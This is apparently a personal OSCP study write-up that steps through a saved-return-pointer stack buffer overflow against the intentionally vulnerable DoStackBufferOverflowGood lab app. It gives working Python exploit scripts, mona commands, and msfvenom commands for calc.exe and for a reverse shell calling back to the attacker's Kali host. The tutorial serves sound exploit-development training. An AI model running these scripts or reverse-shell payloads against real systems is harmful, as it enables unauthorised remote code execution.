Beginning Buffer Overflows (saved return pointer overwrite)

Most technical folks will have some level of familiarity with the concept of buffer overflows and the impact they can have.

Offensive Security’s OSCP/PWK course was the first time I’d gone through the process step by step to create one.

You’ll find several write-ups of how to perform this process but I wanted to write this up myself as:

  1. It helps me get the idea concrete in my own mind and writing this out forced me to answer some questions I didn’t understand – and it raised a few more questions for me too!
  2. You need to know how to do this to pass the OSCP exam, and it seems to be an area that scares folks, especially those with an infra rather than dev background, which is understandable. I think this is a shame as the steps seem straightforward, can be practiced, and it’s worth a massive 25% of the total possible exam marks. This seems an easier 25 marks than exploiting the “hard” 25pt box
  3. I found the concepts interesting 😊

If you find any technical mistakes here please let me know as I’m still learning this stuff and want to know 🙂

Very Important! Only run on services/machines you own or have permission to

It should go without saying but you must only run this stuff on services or machines that you own or have permission to perform this on and be sure to update the code for your own setup.

Running stuff like this on machines you don’t have permission to use could get you into a lot of trouble, cause damage, or even land you in jail.

With that out the way the good news is that there are plenty of really good and legal options to practice this stuff such as:

  • Locally in a VM with various intentionally vulnerable apps (I’ll discuss how to do this shortly)
  • TryHackMe have a room with many examples for practicing

Other items of note

We should note that this is probably the simplest possible example of a buffer overflow.

Modern applications are compiled with protections enabled (ASLR support etc) that make this process much harder or impossible, and modern operating systems have additional checks to prevent this naughtiness.

There’s all sorts of stuff I don’t understand yet that is designed to prevent this, from randomising addresses to putting a value on the stack and checking it’s still there (stack canaries).

However, don’t think that buffer overflows don’t occur any more, as there are many examples in some well known applications and they continue to be a massive issue.

Credits – Justin Steven Do Stack Buffer Overflow Good Tutorial

I’m going to base most of my code on the code in Justin Steven’s awesome tutorial. This is a really great tutorial and I highly recommend you work through it as he goes into a lot more detail than I will.

Be sure as well to check out the Cyber Mentor’s Buffer Overflows made easy series on YouTube – I love how he explains stuff.

What you will need to follow along

If you want to follow along with my example that’s based on DoStackBufferOverflowGood tutorial you’ll need the following:

  • DoStackBufferOverflowGood tutorial and intentionally vulnerable app. I am going to make use of the excellent buffer overflow tutorial and code created by Justin Steven.
    Another option you could also use is VulnServer. In fact you should try this too. This app has several buffer overflows for you to practice. The easiest uses the TRUN command and you’ll need to send “TRUN /.:/” (the dot is needed as the app checks for it)
  • Kali VM (192.168.42.128 in my example)
  • Windows VM (192.168.42.130 in my example)
    You want an older version of Windows which does not have various protections in place. I used Win7 VM with IE11 x86 from https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/
  • Immunity debugger (https://www.immunityinc.com/products/debugger/). You need to install this on the Windows machine
  • Mona, an Immunity extension written in Python. The mona.py script is copied into Immunity’s PyCommands directory and adds additional functionality we will use

Stages

Creating a buffer overflow has several steps and it’s important you don’t skip a step. If you do then it becomes very difficult to work out why stuff isn’t working so don’t be tempted to – it will save you time I promise!

So what are the steps?

  1. Check connectivity to the vulnerable app from Kali to Windows. We’re going to check we can connect to the vulnerable application with Netcat (nc) and send it some data
  2. Trigger the buffer overflow. We’ll write a Python script and send data of sufficient length to trigger a buffer overflow
  3. Work out exactly how much data to send so our data ends up in the EIP register. The EIP (Extended Instruction Pointer) register holds the address of the next instruction to execute, and by putting data here we can control the program flow muhahaah
  4. Confirm we have targeted the EIP correctly. We will confirm we have everything right by adding the characters “BBBB” and checking they are in the EIP
  5. Remove Bad Characters. We can’t use some characters in our buffer overflow as, for various reasons, they will stop it working. These are things like 0x00 which terminates strings.
    We’ll send the vulnerable app a list of all the possible characters then compare what is in memory to what we sent. If a character is not in memory we won’t use it in Steps 6 and 7 where we generate code (it’s a baaad character!)
  6. Locate the address of a JMP ESP instruction in the app or its libraries. You might think you can just add our code to run at this point.
    Unfortunately, we cannot guarantee where stuff will be in memory so we cannot hardcode this. The solution is we’ll find the address of an instruction that stays the same and will return us to our shellcode.
    We’ll look for a JMP ESP instruction as this will direct the flow to the code at the ESP (Extended Stack Pointer, or where we are on the stack) where our shellcode will be ready & waiting. We’ll also need to remember to encode this address in a special way, as x86 processors expect numbers and memory addresses to be stored back to front (code and ASCII strings are front to back for reasons I don’t understand). This is referred to as little-endian architecture.
  7. Finally we’ll generate the (shell) code we want to run using a tool called msfvenom. Shellcode is machine code that the CPU can execute directly. We’ll generate some shellcode that will run calc.exe. Whilst you could also generate a reverse shell (a connection back to your machine), it isn’t a bad idea to do the simplest thing possible so you can be sure your code is working and you are not facing other issues such as a firewall blocking your reverse shell.

    We’re nearly ready to go but we have one more issue to work through. When we generate shellcode with msfvenom and exclude bad characters, it is encoded and begins with a small decoder. The decoder works out where it is in memory using a technique called GetPC (Get Program Counter), which can overwrite a few bytes at the top of the stack. As the ESP points at the start of our shellcode, this can stop it working.

    Two approaches to solving this are:
    • Adding a load of empty (NOP or No Operation) instructions before the shellcode that won’t do anything and can be safely overwritten. This is called a NOP sled
    • Adding a machine code instruction that subtracts from the ESP, moving it to lower addresses and away from the code we’ll generate

I picture the whole process looking something like the following.

I’m not convinced I have the order right here (and judging by other conflicting articles I read, this confused others too). You don’t need to understand this if you follow the process, but I found the direction in which stuff was happening (variables being added to the stack etc) quite confusing.

Step 1 – Confirm Connection

Before we do anything let’s check we can talk to the vulnerable app from our Kali machine so we know we have connectivity.

Make sure the DoStackBufferOverflowGood app (I’m going to call this the “app” now as this name is a bit long) is running. When it’s running you should see a console app listing the bytes received etc. You should also check the firewall is disabled on the Windows machine. Next log onto your Kali machine.

I’m then going to use nc to confirm the connection (the Windows machine is 192.168.42.130 and it’s listening on port 31337) and send it “hello”:

You should get a response back from the app and in the Windows machine see it confirming bytes sent.
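If you would rather script this check than use nc, below is a minimal sketch of the same idea. It is written for Python 3 (the exploit scripts in this write-up are Python 2), and can_connect is a name I have made up for illustration. It only confirms that the TCP port accepts a connection; it does not send any data.

```python
import socket


def can_connect(host, port, timeout=3.0):
    """Return True if a TCP connection to host:port can be opened."""
    try:
        conn = socket.create_connection((host, port), timeout=timeout)
    except OSError:
        # Covers refused connections, unreachable hosts and timeouts.
        return False
    conn.close()
    return True
```

With the lab addresses used here you would call can_connect("192.168.42.130", 31337) and expect True while the app is running and the firewall is off.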

Ok we’re ready to write some code.

Step 2 – Python script to trigger bug
We’re now ready to write some code to send enough data to the app to trigger an overflow error.

On the Windows machine do the following:

  1. Close the app as we’ll run it in Immunity from now on
  2. Open the app in Immunity debugger
  3. The app may pause at some points. Press the play button until the app shows the current status as “running” in the bottom right corner. Whenever you re-open the app you’ll need to do this

Back to the Kali machine where we’ll trigger the issue.

Important!
Make sure you update the values for your setup, otherwise it won’t work or you could be sending stuff to a machine you don’t have permission to test (which will probably do nothing, but make sure you are not doing this).

You’ll need to change some of these values for your lab environment:
RHOST refers to the Windows machine the vulnerable app is running on
RPORT the port it is using (will be 31337 for this test app).

Note the line that reads buf += "A"*1024. This is the number of A’s we’ll send the app to trigger the issue:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf = ""
buf += "A"*1024
buf += "\n"

s.send(buf)

Save your script (I called mine exploit.py) and give it executable permission with:

chmod +x exploit.py

We should now be good to run it with:

% ./exploit.py

If you have done everything right, the app should crash and you should see an access violation in Immunity. If you go to the register pane (top right) you should see the value 41414141 in the EIP register. If you wondered where this came from, 0x41 is 65 in decimal and 65 is the ASCII code for “A”, so these are four of the A’s we sent.
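To make the link between the register value and our input concrete, here is a tiny Python 3 sketch (the variable names are mine) that turns the 32-bit value seen in the EIP back into the characters that produced it:

```python
import struct

eip_value = 0x41414141                   # value shown in the EIP register
raw = struct.pack("<I", eip_value)       # the 4 bytes as they sit in memory
as_text = raw.decode("ascii")            # the same bytes read as ASCII

print(hex(ord("A")), as_text)            # prints: 0x41 AAAA
```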

Step 3 – Work out how many characters it takes to overwrite EIP

The next thing we need to work out is exactly how many characters we need to send before we reach the point where we overwrite the value that ends up in the EIP register. My understanding is that this value (the saved return pointer on the stack) would normally tell the function where to return to. We’ll make use of this to redirect execution to our shellcode later!

Whilst you could send these characters one at a time using trial and error to work this out there is a quicker way and we’ll use Metasploit’s pattern_create script. This will generate a sequence of unique characters we can send and then compare what ends up in the EIP to work out the position.

On the Kali machine run the following command to create this pattern. Note that -l 1024 is the length of the pattern we will create. As we know we can trigger the crash by sending 1024 A’s, this will be enough:

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1024

We’ll then take this pattern generated and update the code to send this pattern:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf = ""
buf += ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab"
  "8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8A"
  # ... rest of the pattern omitted for brevity
  )
buf += "\n"

s.send(buf)

Remember to restart the app on the Windows machine and make sure it’s in a running state before running the script.

The application should crash:

We then need to see what characters ended up in the EIP register.

Here we can see the numbers 39654138:

On the Kali machine we’ll pass this number into a special script called pattern_offset.rb to work out this position:

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39654138

This script should return the following message:

Exact match at position 146

Great – remember this number as we’ll need it for the next bit.
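If you are curious how the two Metasploit scripts arrive at this number, the idea can be sketched in a few lines of Python 3. This is my own simplified re-implementation for illustration, not the Metasploit code: pattern_create and pattern_offset here are just local functions that build the same upper/lower/digit triplet sequence and search it for the four bytes found in the EIP (reversed, because the register value is little-endian).

```python
import string
import struct


def pattern_create(length):
    """Build the 'Aa0Aa1Aa2...' pattern, truncated to the requested length."""
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    # Requested more than the 20280 characters this scheme can produce.
    return "".join(chunks)[:length]


def pattern_offset(eip_value, length=1024):
    """Return the position of the EIP bytes in the pattern, or -1."""
    # 0x39654138 is stored in memory as 38 41 65 39, i.e. the text "8Ae9".
    needle = struct.pack("<I", eip_value).decode("ascii")
    return pattern_create(length).find(needle)


print(pattern_offset(0x39654138))  # prints 146
```

Every 4 character window in the pattern is unique, which is why a single register value is enough to pin down the offset.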

Step 4 – Confirm we have the correct offset

OK things are looking good but we want to check this position is right so we’ll attempt to put 4x B’s in the EIP.

Note that the hex ASCII code for “B” is 42 (0x42 is 66 in decimal, and 66 is the ASCII code for “B”).

Update the code to the following, noting we have added the position returned by the script above:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf_totlen = 1024
offset_srp = 146

buf = ""
buf += "A"*(offset_srp - len(buf))    # padding
buf += "BBBB"                         # SRP overwrite
buf += "CCCC"                         # ESP should end up pointing here
buf += "D"*(buf_totlen - len(buf))    # trailing padding
buf += "\n"

s.send(buf)

Again restart the app in Immunity and check it’s in the running state. When the app crashes you should see 42424242 in the EIP register (our 4x B’s).

This is awesome as we now have confirmed we can put what we want in the EIP (referred to as having control of the EIP):

Step 5 – Find Bad Characters

We’re not finished yet, however, as most apps will have some characters that, for various reasons, will stop our buffer overflow working.

It appears that almost always this will include 0x00 (NUL which also means end of string in C/C++) and often 0x0A (new line).

To work out what these characters are we will send all the possible bad characters and see what ends up in memory taking note of anything missing.

There’s a couple of ways to do this.

  • Using the mona command !mona bytearray will generate a list of bad characters for you to send and compare
  • Programmatically creating a file containing bad characters in code

I’m going to use Justin’s approach that generates a file with all the bad characters in range 0x00 to 0xFF which we can then copy to the Windows machine and compare in Immunity.

Our code is now:

#!/usr/bin/env python2
import socket

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

badchar_test = ""         # start with an empty string
badchars = [0x00, 0x0A]   # we've reasoned that these are definitely bad

# generate the string
for i in range(0x00, 0xFF+1):     # range(0x00, 0xFF) only returns up to 0xFE
  if i not in badchars:           # skip the badchars
    badchar_test += chr(i)        # append each non-badchar char to the string

# open a file for writing ("w") the string as binary ("b") data
with open("badchar_test.bin", "wb") as f:
  f.write(badchar_test)

buf_totlen = 1024
offset_srp = 146

buf = ""
buf += "A"*(offset_srp - len(buf))    # padding
buf += "BBBB"                         # SRP overwrite
buf += badchar_test                   # ESP points here
buf += "D"*(buf_totlen - len(buf))    # trailing padding
buf += "\n"

s.send(buf)

Save this script, restart the app in Immunity and run the script.

The app should crash as before and if we go to the register pane, right click on ESP and select the follow in dump option we should see what’s in memory:

If we go through the characters in order we can see 00 and 0A are not where we’d expect to find them ordered with the other characters:

There is an easier way however than manually looking through every character. Simply copy the generated file to the Windows machine C drive and run the following:

!mona compare -a esp -f c:\badchar_test.bin

Mona will then do a comparison and show us the values missing:

These are our bad characters. Take note of these as we’ll need them in a short time when we generate the code we want to run.
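The comparison itself is simple enough to sketch in Python 3. The function below is not what mona does internally (I have not checked its implementation); it is just an illustration of the idea of walking the bytes we sent alongside the bytes copied out of the memory dump and reporting the first place they differ. The name first_mismatch is made up.

```python
def first_mismatch(sent, in_memory):
    """Return (index, sent_byte) for the first differing byte, or None."""
    sent = bytearray(sent)
    in_memory = bytearray(in_memory)
    for index, expected in enumerate(sent):
        # A short dump means the data was cut off at this byte.
        if index >= len(in_memory) or in_memory[index] != expected:
            return index, expected
    return None


# The same test string the exploit script builds: 0x00-0xFF minus known bad chars.
sent = bytes(b for b in range(0x00, 0x100) if b not in (0x00, 0x0A))

# If memory matches what we sent, there are no further bad characters.
print(first_mismatch(sent, sent))  # prints None
```

If this returned a position instead, you would add the byte it reports to the badchars list, regenerate the test string, and repeat until nothing differs.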

Step 6 – Find a JMP Point

Now you might think you have everything you need to generate your code but there’s one more step we need to do.

We need to find a location in memory that won’t change to put into the EIP. We need to do this as:

  • The operating system may end up randomising some addresses
  • Stuff may move around in the app e.g. if it had multiple threads handling connections

There are certain things that will always be at the same location (gadgets) we can point the app at that will then return execution flow to where our shell code is ready and waiting.

We’ll look for an instruction called JMP ESP.  We can tell Mona to search all of memory for this instruction and also make sure that it doesn’t contain our known bad characters:

!mona jmp -r esp -cpb "\x00\x0A"

Mona has returned the following addresses:

0x080414C3

0x080416BF

We also need to check these points don’t have memory protection things enabled so check the ASLR, Rebase etc are all set to false.

If we want we can see the instruction at these addresses by right clicking on the address and selecting the “Follow Disassembler” option.

You should see JMP ESP command at both locations:

So now we have an address of a gadget we can use (0x080414C3).

However the CPU needs us to present this back to front (little-endian encoding), so 0x080414C3 is sent as the bytes C3 14 04 08.

We could either reverse this manually ourselves or import the struct library and use its pack function. I think the latter is better as it’s less error prone, and it’s very easy to make a simple mistake when reversing by hand.
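As a small sketch of that conversion (Python 3 here, though struct.pack takes the same arguments in Python 2), the snippet below packs the gadget address as a little-endian unsigned 32-bit integer and double checks that none of the resulting bytes are in our bad character list. The variable names are mine.

```python
import struct

ptr_jmp_esp = 0x080414C3          # JMP ESP address reported by mona
bad_chars = b"\x00\x0a"           # bad characters found in Step 5

# "<" means little-endian, "I" means unsigned 32-bit integer.
packed = struct.pack("<I", ptr_jmp_esp)
# packed is now b"\xc3\x14\x04\x08"

# True if the address is safe to send past the bad character filter.
address_is_clean = not any(byte in bad_chars for byte in packed)
print(address_is_clean)  # prints True
```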

Step 7 – Generate Shell Code

Ok we’re almost ready to generate our code.

We’ll use a tool called msfvenom to generate machine code to fire up good old calc.exe!

Why kick off calc.exe? Whilst you could go straight to a reverse shell, it’s not a bad idea to do the simplest thing possible.

A reverse shell has other stuff that might get in the way, e.g. firewalls/networks, and if you don’t get a connection back you won’t know whether it’s your exploit code or this. Firing up calc confirms our code works.

We’ll generate shellcode using the following command, being sure to pass in the bad characters we found (\x00 and \x0A):

msfvenom -p windows/exec -b '\x00\x0A' -f python --var-name shellcode_calc CMD=calc.exe EXITFUNC=thread

Note if you want to generate a reverse shell below is the code you will want:

msfvenom -p windows/shell_reverse_tcp -b '\x00\x0A' LHOST=KALIIP LPORT=KALILISTENINGPORT -f python --var-name shellcode_calc

There are some gotchas you need to be aware of here:

Gotchas

  • Make sure you pass in the bad characters we have identified to msfvenom. That’s the bit that says -b '\x00\x0A'
  • It’s probably best to do the simplest thing, like running calc.exe, before trying to create a reverse shell, so you know your code is working before introducing additional complexity. There could be several reasons a reverse shell won’t work, such as connections being blocked
  • If you are creating a reverse shell make sure you can accept connections from the Windows machine by adding firewall exceptions
  • Make sure you have something listening to catch the reverse shell! (e.g. nc -lvnp 4444)

There’s one final step we need to do.

The first few bytes of our shellcode could get overwritten accidentally. This is apparently because the generated code needs to work out where it is in memory, which can involve a routine called GetPC that writes to the stack right where our shellcode starts. We want to make sure this doesn’t happen.

There’s 2 ways of doing this:

  • Put a load of empty instructions that can be overwritten (NOP sled)
  • Add an instruction to move the ESP away from our shell code

Option 1 – NOP (No Operation) sled
Add below before shell code:

buf += "\x90" * 12 #NOP sled

0x90 is the x86 opcode for NOP (do nothing) in case you are wondering.

Option 2 (better practice)

We can generate an instruction to move away from the Shellcode with metasm_shell e.g.

/usr/share/metasploit-framework/tools/exploit/metasm_shell.rb
sub esp, 0x10

This is considered better practice and uses less space which could be important if you have limited bytes to work with.
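As a rough sketch of how option 2 could slot into the buffer, the Python 3 snippet below lays out a payload with the stack adjustment in place of a NOP sled. The bytes \x83\xec\x10 are the x86 encoding of sub esp, 0x10, which is what metasm_shell should give you for that instruction. build_payload is a hypothetical helper of my own, and the \xcc bytes are only a placeholder standing in for real msfvenom output.

```python
import struct

SUB_ESP_10 = b"\x83\xec\x10"  # machine code for: sub esp, 0x10


def build_payload(offset, ret_addr, shellcode, total_len=1024):
    """Lay out: padding | return address | sub esp | shellcode | filler."""
    buf = b"A" * offset                    # padding up to the saved return pointer
    buf += struct.pack("<I", ret_addr)     # overwrite it with the JMP ESP address
    buf += SUB_ESP_10                      # ESP points here; runs first
    buf += shellcode                       # then execution falls into the shellcode
    buf += b"D" * (total_len - len(buf))   # trailing filler up to total_len
    return buf + b"\n"


# Placeholder shellcode only; substitute the bytes msfvenom generates.
demo = build_payload(146, 0x080414C3, b"\xcc" * 8)
print(len(demo))  # prints 1025
```

The adjustment costs 3 bytes here compared with 12 for the NOP sled used in this write-up, which is the space saving mentioned above.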

So our final code will look something like:

#!/usr/bin/env python2
import socket
import struct

RHOST = "INSERTWINDOWSMACHINEIP"
RPORT = 31337

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

buf_totlen = 1024
offset_srp = 146
ptr_jmp_esp = 0x080414C3 # JMP ESP gadget location

shellcode_calc =  b""
shellcode_calc += b"\xb8\xa9\x2c\x37\x99\xda\xc5\xd9\x74\x24"
shellcode_calc += b"\xf4\x5b\x31\xc9\xb1\x31\x83\xeb\xfc\x31"
# ... remaining msfvenom output omitted for brevity

buf = ""
buf += "A"*(offset_srp - len(buf))      # padding
buf += struct.pack("<I", ptr_jmp_esp)   # SRP overwrite (little-endian)
buf += "\x90" * 12                      # NOP sled, ESP points here
buf += shellcode_calc                   # shellcode follows the sled
buf += "D"*(buf_totlen - len(buf))      # trailing padding
buf += "\n"

s.send(buf)

I found Immunity could sometimes interfere with the shell code so I’d close it out of Immunity and run as an app.

All being well you should see calc pop up on the Windows machine!

Next you might want to generate reverse shell code and replace the calc code in exploit.py.

Here’s a reverse shell being caught using this approach: